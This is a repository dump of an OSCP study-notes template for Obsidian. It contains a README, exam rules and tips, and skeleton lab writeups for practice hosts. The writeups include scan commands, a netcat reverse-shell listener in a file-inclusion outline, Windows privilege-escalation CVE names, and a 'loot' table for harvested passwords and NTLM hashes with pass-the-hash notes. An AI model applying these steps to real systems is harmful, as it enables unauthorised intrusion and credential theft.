(example.corp).md: -------------------------------------------------------------------------------- 1 | I ran this command to spray found credentials across the domain: 2 | 3 | ```bash 4 | $ 5 | ``` -------------------------------------------------------------------------------- /Exam/Exam Index.md: -------------------------------------------------------------------------------- 1 | You do not need to flesh this note out in your exam, but it may help to at least create a ticklist, or sketch out ideas for how you might exploit a machine to decide what to go for next. 2 | 3 | ## To Do 4 | 5 | Independent Machines: 6 | - [x] [[#Machine 1]] 7 | - [x] Low Privilege Access 8 | - [x] Privilege Escalation 9 | - [ ] [[#Machine 2]] 10 | - [ ] Low Privilege Access 11 | - [ ] Privilege Escalation 12 | - [ ] [[#Machine 3]] 13 | - [ ] Low Privilege Access 14 | - [ ] Privilege Escalation 15 | 16 | Active Directory: 17 | - [x] Initial Access 18 | - [x] Pivoting 19 | - [x] Compromise Domain Controller 20 | 21 | ## AD Set 22 | 23 | [[AD Set Domain Index]] 24 | 25 | ## Machine 1 26 | 27 | [[Exam Machine 1 Index]] 28 | 29 | This machine involved... 
30 | 31 | ## Machine 2 32 | 33 | [[Exam Machine 2 Index]] 34 | 35 | ### Todo 36 | 37 | - [x] Scan 38 | 39 | ### Ideas 40 | 41 | - [ ] Check anonymous FTP 42 | - [ ] Check for CVEs in FTP version 43 | 44 | ## Machine 3 45 | 46 | [[Exam Machine 3 Index]] 47 | 48 | ### Todo 49 | 50 | - [ ] Scan -------------------------------------------------------------------------------- /Exam/Independent Machine 1/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Exam Machine 1 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.10.1|Unknown|Unknown| -------------------------------------------------------------------------------- /Exam/Independent Machine 1/Exam Machine 1 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/Independent Machine 1/00 - Overview]] -------------------------------------------------------------------------------- /Exam/Independent Machine 2/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Exam Machine 2 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.10.2|Unknown|Unknown| -------------------------------------------------------------------------------- /Exam/Independent Machine 2/Exam Machine 2 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/Independent Machine 2/00 - Overview]] -------------------------------------------------------------------------------- /Exam/Independent Machine 3/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Exam Machine 3 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.10.3|Unknown|Unknown| -------------------------------------------------------------------------------- /Exam/Independent 
Machine 3/Exam Machine 3 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/Independent Machine 3/00 - Overview]] -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Andy Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.0.1|Andy|Windows 7 SP1| 8 | 9 | ## Box Outline 10 | 11 | Box outlines are useful for revisiting the box and seeing how you exploited it. They may help you find practical examples of exploits, or trigger you to think about what you could improve 12 | 13 | **Enumeration** 14 | 15 | What services are running on the box? How did you enumerate them? 16 | 17 | **Exploitation** 18 | 19 | What exploits did you try? Which ones worked? 20 | 21 | **Privilege Escalation** 22 | 23 | What user did you gain access on the box as? What did you find during local enumeration? How did you escalate your privileges? 24 | 25 | **Post Exploitation** 26 | 27 | Any useful information found on the machine. 28 | 29 | ## Timeline 30 | 31 | You can use this section to track when you started and finished this machine, including when you gained a 'foothold' (low-privilege shell) on the box and began privilege escalation. Knowing how long it took can help to judge how long a machine may take on the exam. 32 | 33 | |Date Started|Date of Foothold|Date Finished| 34 | |---|---|---| 35 | ||| 36 | 37 | ## Tags 38 | 39 | Use this section to categorise the machine so you can easily search for machines similar to it. 
40 | 41 | #windows -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/05 - Enumeration.md: -------------------------------------------------------------------------------- 1 | # Andy Enumeration 2 | 3 | ## nmap 4 | 5 | I ran the following command: 6 | 7 | ```bash 8 | $ nmap -sC -sV -oA nmap/andy 10.0.0.1 9 | ``` 10 | 11 | Key Findings: 12 | - Web Server on port 80 13 | - SMB on port 445 14 | 15 | ### All Ports 16 | 17 | I also ran a full port scan: 18 | 19 | ```bash 20 | $ nmap -p- -oA nmap/andy-allports 10.0.0.1 21 | ``` 22 | 23 | It found no new ports. 24 | 25 | ## SMB Enumeration 26 | 27 | ### SMBMap 28 | 29 | I ran `smbmap` to enumerate shares. 30 | 31 | ### SMBClient 32 | 33 | I connected with `smbclient` to read files. 34 | 35 | ## Gobuster 36 | 37 | I ran the following gobuster scan: 38 | 39 | ```bash 40 | $ gobuster dir -u http://10.0.0.1 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x php 41 | ``` 42 | 43 | It found the following interesting pages: 44 | - `/remote.php` -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/10 - Website.md: -------------------------------------------------------------------------------- 1 | # Website 2 | 3 | Screenshot of website index page: 4 | 5 | ![[Pasted image 20210813173305.png]] 6 | 7 | ## Enumerating Tech Stack 8 | 9 | ### Examining Source 10 | 11 | ### Enumerating PHP Version 12 | 13 | ## Gobuster 14 | 15 | I ran [[Labs/10.0.0.1 (Andy)/05 - Enumeration#Gobuster|Gobuster]] - it found `/remote.php`. 16 | 17 | ## Remote File Inclusion 18 | 19 | I found a Remote File Inclusion vulnerability on the `/remote.php` site. 20 | 21 | ### Testing RFI 22 | 23 | Outline process of testing parameters on page for RFI... 24 | 25 | ### Gaining a Shell 26 | 27 | Outline process of debugging shell execution... 
28 | 29 | Summary of commands used to gain shell: 30 | - Start a listener with `sudo nc -lnvp 413` 31 | - Visit the following url: ... -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/15 - Shell as Andy.md: -------------------------------------------------------------------------------- 1 | # Shell as Andy 2 | 3 | ## Local Enumeration 4 | 5 | I ran the following commands to enumerate the system: 6 | - `whoami` 7 | - ... 8 | 9 | ## Windows Exploit Suggester 10 | 11 | ### Running Exploit Suggester 12 | 13 | ### Results 14 | 15 | Here is the output of Windows Exploit Suggester... 16 | 17 | I have laid out the potential exploits in [[16 - Potential Local Exploits]] 18 | 19 | ## Trying MS16-032 20 | 21 | Summary of commands used... 22 | 23 | MS16-032 failed. 24 | 25 | ## Trying MS16-135 26 | 27 | Summary of commands used... 28 | 29 | MS16-135 succeeded! We have a shell as `SYSTEM`. -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/16 - Potential Local Exploits.md: -------------------------------------------------------------------------------- 1 | # Potential Local Exploits 2 | 3 | - [x] MS16-032 - failed 4 | - [x] MS16-135 - succeeded 5 | - [ ] MS16-098 -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/20 - Post Exploitation.md: -------------------------------------------------------------------------------- 1 | # Post Exploitation 2 | 3 | I ran the following commands after exploiting the system to find more information about the lab environment. 4 | 5 | ## Network Enumeration 6 | 7 | I ran the following commands to see what the box is communicating with: 8 | 9 | ```cmd 10 | C:> netstat 11 | ``` 12 | 13 | ## Hash Extraction 14 | 15 | I extracted NTLM hashes from the machine as follows... 16 | 17 | I tried to crack the password, but couldn't. 18 | 19 | See hashes in [[Lab Loot#Password Hashes]]. 
-------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/Andy Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Labs/10.0.0.1 (Andy)/00 - Overview]] 2 | 3 | Enumeration: [[Labs/10.0.0.1 (Andy)/05 - Enumeration]] 4 | 5 | Website Assessment: [[10 - Website]] 6 | 7 | Shell on Machine as Andy, Privesc to System: [[15 - Shell as Andy]] 8 | 9 | List of Potential Exploits: [[16 - Potential Local Exploits]] 10 | 11 | Post Exploitation: [[20 - Post Exploitation]] -------------------------------------------------------------------------------- /Labs/10.0.0.2/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # 10.0.0.2 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.0.2|Unknown|Linux| -------------------------------------------------------------------------------- /Labs/10.0.0.2/05 - Enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | I ran the following scans against 10.0.0.2... 
-------------------------------------------------------------------------------- /Labs/10.0.0.2/10.0.0.2 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Labs/10.0.0.2/00 - Overview]] 2 | 3 | Enumeration: [[Labs/10.0.0.2/05 - Enumeration]] -------------------------------------------------------------------------------- /Labs/10.1.0.1 (Sandy)/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Sandy Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.1.0.1|Sandy|Linux| -------------------------------------------------------------------------------- /Labs/10.1.0.1 (Sandy)/05 - Enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | I ran the following scans against 10.1.0.1... 4 | 5 | Key findings: 6 | - Hostname: Sandy (exposed by redirect on port 80) 7 | - FTP on Port 21 (anonymous login allowed) 8 | - Webserver on Port 80 -------------------------------------------------------------------------------- /Labs/10.1.0.1 (Sandy)/Sandy Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Labs/10.1.0.1 (Sandy)/00 - Overview]] 2 | 3 | Enumeration: [[Labs/10.1.0.1 (Sandy)/05 - Enumeration]] -------------------------------------------------------------------------------- /Labs/Lab Loot.md: -------------------------------------------------------------------------------- 1 | Store any secrets from the labs here. You may be able to reuse them. 2 | 3 | ## Emails 4 | 5 | Store looted emails here in case they can be used to log in or phish users. 6 | 7 | |Email|Where Found?|Notes| 8 | |---|---|---| 9 | ||| 10 | 11 | ## Users 12 | 13 | Store known/potential users that you've found here - they may also have accounts on other systems. 
14 | 15 | |Username|Where Found?|Notes| 16 | |---|---|---| 17 | ||| 18 | 19 | ## Passwords 20 | 21 | Store plaintext or cracked passwords here for potential later reuse. 22 | 23 | |Username|Password|Service|Where Found?|Notes| 24 | |---|---|---|---|---| 25 | |||||| 26 | 27 | ## Password Hashes 28 | 29 | You can reuse NTLM hashes in pass the hash attacks, or by cracking them and using the passwords for password reuse attacks later in the lab. Store them here. 30 | 31 | |Hash|Hash Type|Where Found?|Notes| 32 | |---|---|---|---| 33 | |08fb...89ed|NTLM|[[15 - Shell as Andy\|Andy]]|We could reuse this in a pass the hash attack...| -------------------------------------------------------------------------------- /Labs/Labs Index.md: -------------------------------------------------------------------------------- 1 | ## Accessing the Labs 2 | 3 | **Add your personalised Control Panel link here** 4 | 5 | Connection command: 6 | 7 | ```bash 8 | $ openvpn ... 9 | ``` 10 | 11 | ## Network Scans 12 | 13 | See [[Network Scans]] for details of how I enumerated the lab environment. 14 | 15 | ## Machines 16 | 17 | See writeups of machines below. 18 | 19 | ### Windows Machines 20 | 21 | **Network A** 22 | - [[Andy Index|Andy (10.0.0.1)]] 23 | 24 | **Network B** 25 | - [[Sandy Index|Sandy (10.1.0.1)]] 26 | 27 | ### Linux Machines 28 | 29 | **Network A** 30 | - [[10.0.0.2 Index|10.0.0.2]] -------------------------------------------------------------------------------- /Labs/Lessons Learned.md: -------------------------------------------------------------------------------- 1 | In this note I collected all the key things I learned on the labs - useful commands for obscure services, alternative ways to enumerate for niche or well-hidden files, common pitfalls and issues with specific services or techniques, and things I wished I'd known when stuck in a rabbit hole for hours. 
2 | 3 | These lessons can really be anything - the purpose of this note is to look back at what mistakes you made, and to have a resource to look at when you're in a rut. 4 | 5 | I split the lessons into vague categories, with links to the machines that I learned them on. An example layout is below. 6 | 7 | ## Enumeration 8 | 9 | ### Nmap 10 | 11 | - Use the `-v` flag to see ports as they appear - this lets you explore the attack surface quicker 12 | 13 | ### Windows 14 | 15 | - On old versions, there are some alternatives to `whoami`: 16 | - `set` 17 | - `systeminfo` 18 | - `net user` 19 | - `echo %username%` 20 | - `echo %userprofile%` 21 | 22 | ## Password Cracking 23 | 24 | - Use the `-n` flag when echoing hashes to a file to avoid a trailing newline (see [[Andy Index|Andy]]) -------------------------------------------------------------------------------- /Labs/Live Hosts.md: -------------------------------------------------------------------------------- 1 | Track live lab hosts here. I found it helps to add notes about the host after the IP address, so I can identify my next target. 2 | 3 | **Highlight** any exploits that may identify low-hanging fruit. 4 | 5 | Tick the hosts off as you complete them. 6 | 7 | ## Example Network A 8 | 9 | **IP Range:** 10.0.0.1/24 10 | 11 | - [x] 10.0.0.1 (Windows 7 Host - Port 80 and 445 open) 12 | - [ ] 10.0.0.2 (Linux Host - Port 8000 and 3306 open) 13 | 14 | ## Example Network B 15 | 16 | **IP Range:** 10.1.0.1/24 17 | 18 | - [ ] 10.1.0.1 (Linux Host - Port 80 and 21 open - **Anonymous FTP allowed**) -------------------------------------------------------------------------------- /Labs/Network Scans.md: -------------------------------------------------------------------------------- 1 | I ran the following commands to enumerate the whole lab environment. 2 | 3 | ## Network A 4 | 5 | ### Host Discovery 6 | 7 | Command: 8 | 9 | ```bash 10 | $ nmap ... 
11 | ``` 12 | 13 | ### Vulnerability Scanning 14 | 15 | I used Nessus to scan the network - see the results below... 16 | 17 | ## Network B 18 | 19 | ### Host Discovery 20 | 21 | ```bash 22 | $ nmap ... 23 | ``` -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP Notes Template 2 | 3 | **Important Note**: if you use this repository, make sure you do not publicly share your OSCP notes by accident (i.e. in a public fork of this repo) or OffSec will be [angry](https://cdn.emojidex.com/emoji/seal/Angryping.png). I am not responsible if you do so and lose access to your course - please be careful and clone this resource locally rather than forking it! If you want your notes on GitHub (which I agree is useful) follow these steps to create a private fork: https://stackoverflow.com/questions/10065526/github-how-to-make-a-fork-of-public-repository-private 4 | 5 | ## Introduction 6 | 7 | This is a template for an Obsidian Vault used to store OSCP notes. Obsidian allows building a highly connected, searchable resource that you can use to find examples of code snippets and connect related machines. 8 | 9 | The [[Course Notes Index|Course Notes]], [[Exam Index|Exam]], and [[Labs Index|Labs]] folders contain template folders for you to add your notes for these respective sections to. 10 | 11 | I cannot upload my OSCP notes due to OffSec policy, but I still wanted to share a useful resource. There are plenty of [[Report Templates]] out there, and some good [note-taking advice](https://www.youtube.com/watch?v=MQGozZzHUwQ), but I haven't seen a structured notes template before. Hopefully this will be useful for future students who want to supplement their learning. 12 | 13 | I've added a few resources to each of the notes, but they are there for you to flesh out (or delete) at your will. 
This is simply a template, and more detailed notes are available in my [[Cybersecurity Notes]] repository. 14 | 15 | ## Installation 16 | 17 | ### Installing Obsidian 18 | 19 | #### On Windows 20 | 21 | Go to [the download page](https://obsidian.md/download)... and click Download. Once it's downloaded, double click the executable to run it. 22 | 23 | #### On Linux 24 | 25 | Go to [the download page](https://obsidian.md/download), and download the AppImage. Put it in any directory you want (I went with `~/Applications`) 26 | 27 | You can either double click the file to run it, or run it with `/path/to/Obsidian-0.11.9.AppImage` 28 | 29 | You may get the following error while running: 30 | 31 | ```bash 32 | $ ./Obsidian-0.11.9.AppImage 33 | \[2122:0327/193255.690087:FATAL:setuid\_sandbox\_host.cc(158)\] The SUID sandbox helper binary was found, but is not configured correctly. Rather than run without sandboxing I'm aborting now. You need to make sure that /tmp/.mount\_Obsidi1nvAuD/chrome-sandbox is owned by root and has mode 4755. 34 | Trace/breakpoint trap 35 | ``` 36 | 37 | To fix this, run obsidian with the `--no-sandbox` flag. Be aware that this turns off the Chromium sandbox the error message refers to, so Obsidian's renderer processes run without that isolation layer. 38 | 39 | I set up this alias in `~/.bashrc`: 40 | 41 | ```bash 42 | alias obsidian="~/Applications/Obsidian-0.11.9.AppImage --no-sandbox" 43 | ``` 44 | 45 | Finally, if Obsidian stops responding on launch, you may need to update your machine: 46 | 47 | ```bash 48 | $ sudo apt update 49 | $ sudo apt full-upgrade -y 50 | ``` 51 | 52 | ### Downloading the Vault 53 | 54 | You will need to [download git](https://git-scm.com/downloads). This is a quick and easy process. 55 | 56 | On Windows, open the Start Menu and search for 'Git Bash', then click it to open a bash terminal (or navigate to the folder you want to install the notes into, then right-click and press 'Git Bash Here'). On Unix, open a terminal of your choice. 
57 | 58 | In this Git Bash/terminal, type the following: 59 | 60 | ```bash 61 | git clone git@github.com:Twigonometry/OSCP-Notes-Template.git 62 | ``` 63 | 64 | If you are uncomfortable using the command line, you can install [GitHub Desktop](https://desktop.github.com/) instead (but you'll need to learn it soon enough!) 65 | 66 | Once you have cloned the repository, open Obsidian and click `Open folder as vault`, then select the `OSCP-Notes-Template` folder that was just created by Git. You're ready to go! 67 | 68 | ## Usage 69 | 70 | ### Approach 71 | 72 | Everyone's note-taking approach is different. Some people might hate Obsidian, but personally I found it very useful for organising and linking my notes, especially when an OSCP box had an exploit I'd seen before and I could link the two notes together. 73 | 74 | I could also use the graph to track where I'd found certain secrets across the network, and which boxes talked to each other. I stored both my machine writeups and my course content notes in the same vault, so I could also easily link examples in the course material to practical examples from the labs. 75 | 76 | Here is an example of the graph Obsidian can generate, with all related notes linked together: 77 | 78 | ![[Pasted image 20210813180944.png]] 79 | 80 | Organising notes this way may seem like a lot of overhead. I don't recommend making your notes this fleshed out while solving the box, but I do think it is useful to go back and complete this process after you've finished. It will help consolidate what you've learned, and make examples of exploits easier to find during the exam. 81 | 82 | You can treat this as a true [Zettelkasten](https://zenkit.com/en/blog/a-beginners-guide-to-the-zettelkasten-method/), with each note representing a [[Find Writeable Directories|singular concept]] - or you can have notes that show [[15 - Shell as Andy|a narrative]]. 
I prefer a mix - notes on tools are good as singular items, and writeups of machines are good to read in one long document. Cheat sheets can be used to link the two with examples. 83 | 84 | ### Course Content 85 | 86 | You can make notes on course content within the [[Course Notes Index|Course Notes]] folder. I like to include example commands within code fences (single/triple backtick ``` ` ``` characters). 87 | 88 | I like keeping my notes within headings so that I can then link these headers to a practical example on a machine, using `[[course chapter#section]]`. 89 | 90 | ### Writing up Lab Machines 91 | 92 | The [[Labs Index|Labs]] folder can be used to house writeups for machines in the labs. I've added a folder for each one, with `IP Address (Hostname)` as the title. 93 | 94 | Within each folder is an index for the machine, which links all the related notes on the graph, an Overview which outlines key machine details, and usually a 'Lessons Learned' note which highlights important new skills or tools I learned solving the box (or things I did wrong). 95 | 96 | See [[Labs/10.0.0.1 (Andy)/00 - Overview]] for a fleshed out example Box Overview. 97 | 98 | I then create a note for each 'stage' of the box - commonly one for generic enumeration, one for each service I interact with beyond standard enum scripts, and one for each shell I gain as a specific user. 99 | 100 | ### Resources 101 | 102 | You will find assorted OSCP resources in the `/Resources` folder. They vary from collections of advice posts on various forums, to extra cheatsheets and tools to make your life easier. Feel free to add to this folder as you find things. 103 | 104 | ### Obsidian Tricks 105 | 106 | Obsidian makes it super easy to build good notes. Here are some of the best features: 107 | - `Ctrl + K` for inserting links 108 | - `[[note]]` for referencing an internal note and creating a graph. 
You can use a pipe (`|`) to name the link, or a hash (`#`) to link to a heading in the note 109 | - `Ctrl + G` to view your graph 110 | - `Ctrl + L` to view a 'local graph' for a note - this lets you explore connections to a note 111 | - `Ctrl + Click` a note link to open it in a new tab (Obsidian [now supports tabs!](https://forum.obsidian.md/t/obsidian-release-v1-0-0/44873)) 112 | 113 | You can add screenshots, headings, and any other formatting option supported by markdown. 114 | 115 | You can also make use of the document outline feature (in the right-hand side panel) for an automatically generated contents page. 116 | 117 | #### Canvases 118 | 119 | Obsidian has a neat new feature called a Canvas which can be used to lay out notes in a free-flowing diagram. You can link existing notes, add images, and create notes that only exist in the canvas. It's potentially useful for Active Directory sets - I've included an [[Active Directory Set.canvas|Example]] in the `/Exam` folder. 120 | 121 | #### Workspaces 122 | 123 | You can open a workspace using the workspace button in the left-hand sidebar - this loads a saved layout of notes. You can group together notes you open together frequently (such as a specific lab machine and notes on relevant exploits from the course material) and save your current workspace using the 'save' button. 124 | 125 | #### PDF Generation 126 | 127 | You can create a PDF of a note with the 'Export to PDF' button in the kebab menu at the top of each note. 128 | 129 | ![[Pasted image 20230324145839.png]] 130 | 131 | Bear in mind that Obsidian links will no longer work. 
132 | 133 | #### Website-Friendly Note Conversion 134 | 135 | If you want to host your notes on a website, you can convert them to a HTML-friendly format using my [writeup converter](https://github.com/Twigonometry/writeup-converter#website-formatter) tool - this combines all markdown files in a given folder into one HTML document, and reformats obsidian links (`[[]]`) and turns them into valid HTML tags. 136 | 137 | Remember not to host your writeups or any OffSec course content online... 138 | 139 | #### Screenshots 140 | 141 | Attachments (i.e. images) are set to be stored in the `/Attachments` folder automatically. If you copy and paste an image into Obsidian it will be automatically named and indexed. 142 | 143 | ## Roadmap 144 | 145 | To add to template: 146 | - [x] Instructions for converting Lab report to a PDF 147 | - [x] Workspaces 148 | - [ ] Hotkeys 149 | - [x] Exam tips 150 | - [x] Cheatsheets 151 | - [x] Enable outlines plugin 152 | - [ ] Timeline plugin support 153 | - [ ] Flameshot setup 154 | - [x] Updated exam details 155 | - [x] AD set layout 156 | - [x] Example Canvas for AD set 157 | -------------------------------------------------------------------------------- /Resources/Communities.md: -------------------------------------------------------------------------------- 1 | ## Offsec Forums 2 | 3 | [https://forums.offensive-security.com](https://forums.offensive-security.com) 4 | 5 | ## Offsec Discord Server 6 | 7 | [https://offs.ec/2Q2AL4b](https://offs.ec/2Q2AL4b) ([source](https://www.reddit.com/r/oscp/comments/mwijg3/join_the_offensive_security_discord_server/)) 8 | 9 | ## OSCP Reddit 10 | 11 | [https://www.reddit.com/r/oscp/](https://www.reddit.com/r/oscp/) -------------------------------------------------------------------------------- /Resources/Cybersecurity Notes.md: -------------------------------------------------------------------------------- 1 | For more in-depth cheatsheets and writeups, you can download my [Cybersecurity 
Notes](https://github.com/Twigonometry/Cybersecurity-Notes) Obsidian Vault. -------------------------------------------------------------------------------- /Resources/Exam Details.md: -------------------------------------------------------------------------------- 1 | ## Key Details 2 | 3 | **Length:** 4 | - 23 Hours and 45 Minutes for the exam 5 | - 24 Hours to submit the report 6 | 7 | **Available Points** 8 | - 100 Points from Machines 9 | - 20 each from 3 independent targets 10 | - 40 points for FULL COMPROMISE of the Active Directory Set 11 | - 10 Bonus Points from Report 12 | 13 | Since the course updates ([2022](https://www.offsec.com/offsec/oscp-exam-structure/) and [2023](https://www.offsec.com/offsec/pen-200-2023/)), good organisation of linked machines is more important than ever 14 | 15 | **Passing Grade** 16 | - 70 Points needed to pass 17 | 18 | ## Exam Guide 19 | 20 | The comprehensive exam guide. **Read this in full!** 21 | 22 | [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide) 23 | 24 | ## Exam Support Page 25 | 26 | This page collects several articles on exam topics, including machine hints. 27 | 28 | [https://help.offensive-security.com/hc/en-us/categories/360003918111-Penetration-Testing-with-Kali-Linux-PEN-200-](https://help.offensive-security.com/hc/en-us/categories/360003918111-Penetration-Testing-with-Kali-Linux-PEN-200-) 29 | 30 | ## Exam Rules & Restrictions 31 | 32 | ### Restrictions on Tools 33 | 34 | In summary, commercial tools, automatic exploitation tools, and mass scanning tools are forbidden. Source: [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) 35 | 36 | **One use** of Metasploit is allowed. 
However, utilities such as the metasploit handler module and the msfvenom payload generator have no limitations on use. **Auxiliary** modules are also limited, such as scanners. Source: [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#metasploit-restrictions](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#metasploit-restrictions) 37 | 38 | Some common tools such as LinPEAS have caused issues in the past with automatic exploitation features - the [updated version](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues/125) of LinPEAS is now OSCP-friendly, but Offsec will make no exceptions in future. Read the full statement here: [https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/) 39 | 40 | ### Proctoring and Use of Notes 41 | 42 | OSCP is open book - you can use google and your own notes in the exam. 
Source: [https://www.offensive-security.com/offsec/proctoring/](https://www.offensive-security.com/offsec/proctoring/) -------------------------------------------------------------------------------- /Resources/Exam Tips.md: -------------------------------------------------------------------------------- 1 | ## Writeups and Guides 2 | 3 | ### From TJNull 4 | 5 | [https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html](https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html) 6 | 7 | ### From /u/tristanlogd 8 | 9 | ![[Pasted image 20210418203944.png]] 10 | 11 | Source: [https://www.reddit.com/r/oscp/comments/k7x4o1/just_passed_oscpmy_journey_and_tips/](https://www.reddit.com/r/oscp/comments/k7x4o1/just_passed_oscpmy_journey_and_tips/) 12 | 13 | ### From JohnJHacking 14 | 15 | [https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/](https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/) 16 | 17 | ### My Writeup 18 | 19 | I did my OSCP back in 2021, before the [new course](https://www.offsec.com/offsec/oscp-exam-structure/) was rolled out, which shifted focus away from Buffer Overflows. It has since then been [updated again](https://www.offsec.com/offsec/pen-200-2023/), with a wealth of new content and expansions on old modules. Unfortunately, even if you paid for the OSCP in the past you can't access the new content, despite already forking out over a grand... 20 | 21 | I think this change towards AD-focused content was a positive one, and will modernise the OSCP content a lot. However, I can no longer guarantee that this notes template is laid out in the optimal way for the new content, labs, and exam. You might need to do some tweaking! 
22 | 23 | Nevertheless, you can read my writeup of my OSCP experience here: https://www.mac-goodwin.com/blog/cyber/2021/10/16/oscp-experience.html 24 | 25 | The TLDR is that I learned a lot from my OSCP and thoroughly enjoyed the experience, but I believe the criticism of OffSec's predatory pricing is pretty much warranted. However, the course was still very valuable to me and made me a better hacker - if you can afford it, I recommend it, but remember there are lots of cheaper courses out there (including the [PEH course](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)). Overall, the OSCP is still one of the most recognised certifications out there, and I can attest to its 'HR power' in job interviews and recruiting. OffSec critics don't like to admit it, but the letters next to your name grab the attention of employers, even if they don't mean you're a top-notch hacker. 26 | 27 | ## Taking Screenshots 28 | 29 | Proof screenshots for the exam [need to include](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#screenshot-requirements) the following: 30 | - IP address of the machine (to prove you aren't in a container) 31 | - Contents of `proof.txt` 32 | 33 | From within the directory that holds `proof.txt` (usually `C:\Users\Administrator\Desktop` on Windows and `/root` on Linux), the following command lets you view the required info in one line: 34 | - Windows: `type proof.txt && ipconfig` 35 | - Linux: `cat proof.txt && ip addr` 36 | 37 | Alternative commands are: 38 | - `ifconfig` 39 | - `netstat -ie` (not accepted in the exam, but can be used for your own personal purposes in the lab machines if above commands do not work) 40 | 41 | ## Taking Breaks 42 | 43 | Take regular breaks! 44 | 45 | Try to set yourself regular timers to avoid rabbit holes, and move on after 30 minutes of trying something without progress. 
-------------------------------------------------------------------------------- /Resources/Report Templates.md: -------------------------------------------------------------------------------- 1 | # OSCP Report Templates 2 | 3 | Here are some nice templates for laying out your report. 4 | 5 | - PDFs with custom colours - also has templates for OSEP, OSED: [https://github.com/noraj/OSCP-Exam-Report-Template-Markdown](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown) 6 | - Docx templates: [https://github.com/whoisflynn/OSCP-Exam-Report-Template](https://github.com/whoisflynn/OSCP-Exam-Report-Template) 7 | 8 | OffSec Example Report: [https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf](https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf) -------------------------------------------------------------------------------- /Resources/Tools.md: -------------------------------------------------------------------------------- 1 | # OSCP Tools 2 | 3 | ## nmapAutomator 4 | 5 | An automatic background recon tool: [https://github.com/21y4d/nmapAutomator](https://github.com/21y4d/nmapAutomator) 6 | 7 | ## Autorecon 8 | 9 | Another automatic reconnaissance tool that does more than nmapAutomator: [https://github.com/Tib3rius/AutoRecon](https://github.com/Tib3rius/AutoRecon) 10 | 11 | I often find that less automation is better when doing initial recon - Autorecon will do a lot of scans and not necessarily all of them will be relevant (some of them may even fail). I recommend building your own methodology first (perhaps by looking at the kind of commands these tools run) and practicing manual enumeration, and only using Autorecon once you're comfortable with doing it yourself. --------------------------------------------------------------------------------